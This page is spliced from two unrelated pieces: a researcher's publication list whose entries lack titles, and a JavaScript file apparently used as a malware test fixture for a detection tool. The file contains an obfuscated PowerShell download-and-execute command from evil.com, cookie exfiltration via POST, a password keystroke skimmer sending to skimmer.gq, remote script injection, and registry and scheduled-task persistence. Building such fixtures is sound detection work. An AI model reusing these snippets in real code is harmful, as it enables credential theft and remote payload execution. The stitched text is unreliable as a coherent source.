Rahul Iyer

16 papers B 1C 1Journal 7Unranked 7
YearRankTypeTitle / Venue / Authors
2021 conf
ISIE
Rahul Iyer, Biplav Choudhury, Vijay K. Shah, Ali Mehrizi-Sani
2021 J jnl
CoRR
Rahul Iyer, Biplav Choudhury, Vijay K. Shah, Ali Mehrizi-Sani
2019 conf
BlockSW/CKG@ISWC
Abhisha Bhattacharyya, Rahul Iyer, Kemafor Anyanwu
2018 J jnl
CoRR
Yuezhang Li, Katia P. Sycara, Rahul Iyer
2018 J jnl
CoRR
Michael Honke, Rahul Iyer, Dishant Mittal
2018 conf
eCOM@SIGIR
Angshuman Ghosh, Vineet John, Rahul Iyer
2018 C conf
AIES
Rahul Iyer, Yuezhang Li, Huao Li, Michael Lewis, Ramitha Sundar, Katia P. Sycara
2018 J jnl
CoRR
Rahul Iyer, Yuezhang Li, Huao Li, Michael Lewis, Ramitha Sundar, Katia P. Sycara
2017 conf
GCAI
Yuezhang Li, Katia P. Sycara, Rahul Iyer
2016 B conf
COLING
Yuezhang Li, Ronghuo Zheng, Tian Tian, Zhiting Hu, Rahul Iyer, Katia P. Sycara
2016 J jnl
CoRR
Yuezhang Li, Ronghuo Zheng, Tian Tian, Zhiting Hu, Rahul Iyer, Katia P. Sycara
2016 J jnl
CoRR
Yuezhang Li, Ronghuo Zheng, Tian Tian, Zhiting Hu, Rahul Iyer, Katia P. Sycara
2014 conf
PAKDD Workshops
Hai Qian, Shengwen Yang, Rahul Iyer, Xixuan Feng, Mark Wellons, Caleb Welton
2012 conf
EUSIPCO
Rahul Iyer, Ahmed H. Tewfik
2011 conf
Humanoids
Rahul Iyer, Dana H. Ballard
2007 J jnl
ACM Queue
Garth R. Goodson, Sai Susharla, Rahul Iyer
test_files/test_malicious.js
← Index test_files/test_malicious.js javascript
// Simulated malicious JavaScript sample for testing REDB JS extractors
// This file contains common malware patterns for analysis validation

var _0x4a2f = ["\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64"];
var _0xb3 = ["\x57\x53\x63\x72\x69\x70\x74"];

// Obfuscated string reconstruction
var cmd = String.fromCharCode(112, 111, 119, 101, 114, 115, 104, 101, 108, 108);
var encoded_payload = "cG93ZXJzaGVsbCAtZXAgYnlwYXNzIC1jICJJRVggKE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly9ldmlsLmNvbS9zdGFnZTInKSI=";

// WScript-based malware pattern
var shell = WScript.CreateObject("WScript.Shell");
var fso = WScript.CreateObject("Scripting.FileSystemObject");

// Eval-based code execution
eval(function(p, a, c, k, e, d) {
    while (c--) { if (k[c]) { p = p.replace(new RegExp('\\b' + c.toString(a) + '\\b', 'g'), k[c]) } }
    return p
}('1 0="2://3.4/5";', 6, 6, 'url|var|http|malware|example|download'.split('|'), 0, {}));

// Network communication
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.1.100:8080/exfil", true);
xhr.send(document.cookie);

// File system operations
var stream = WScript.CreateObject("ADODB.Stream");
stream.Open();
stream.Type = 1;

// Registry manipulation
shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "C:\\Users\\Public\\malware.exe");

// Dynamic script injection
var s = document.createElement("script");
s.src = "https://evil-cdn.tk/inject.js";
document.body.appendChild(s);

// DOM skimmer pattern
document.querySelector("input[type=password]").addEventListener("keyup", function(e) {
    fetch("https://skimmer.gq/collect", {
        method: "POST",
        body: JSON.stringify({val: e.target.value})
    });
});

// Crypto miner pattern
var worker = new Worker("data:application/javascript," + atob(encoded_payload));

// Additional obfuscation: concatenated strings
var c2_url = "ht" + "tp" + "://" + "bad" + "guy" + ".r" + "u/" + "gate";

// setTimeout with string execution
setTimeout("eval(atob('" + encoded_payload + "'))", 1000);

function downloadPayload(url) {
    var req = WScript.CreateObject("MSXML2.XMLHTTP");
    req.open("GET", url, false);
    req.send();
    return req.responseText;
}

function persist() {
    shell.Run("cmd.exe /c schtasks /create /tn UpdateCheck /tr C:\\payload.exe /sc daily", 0, false);
    shell.Exec("powershell -ep bypass -c IEX(payload)");
}

downloadPayload(_0x4a2f[0]);
persist();

// Packer-style single-line payload to give the obfuscation heuristic the
// strong-signal evidence it expects from real obfuscator.io output: hex-escape
// density >5% and a max_line >10K chars. The repeat() saturates both.
var _0xpayload="\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x73\x74\x61\x67\x65\x32\x2e\x6a\x73\x3f\x69\x64\x3d".repeat(800)+"\x22\x49\x45\x58\x28\x4e\x65\x77\x2d\x4f\x62\x6a\x65\x63\x74\x20\x4e\x65\x74\x2e\x57\x65\x62\x43\x6c\x69\x65\x6e\x74\x29\x2e\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x53\x74\x72\x69\x6e\x67\x28\x27\x68\x74\x74\x70\x3a\x2f\x2f\x65\x76\x69\x6c\x2e\x63\x6f\x6d\x2f\x70\x61\x79\x6c\x6f\x61\x64\x27\x29\x22";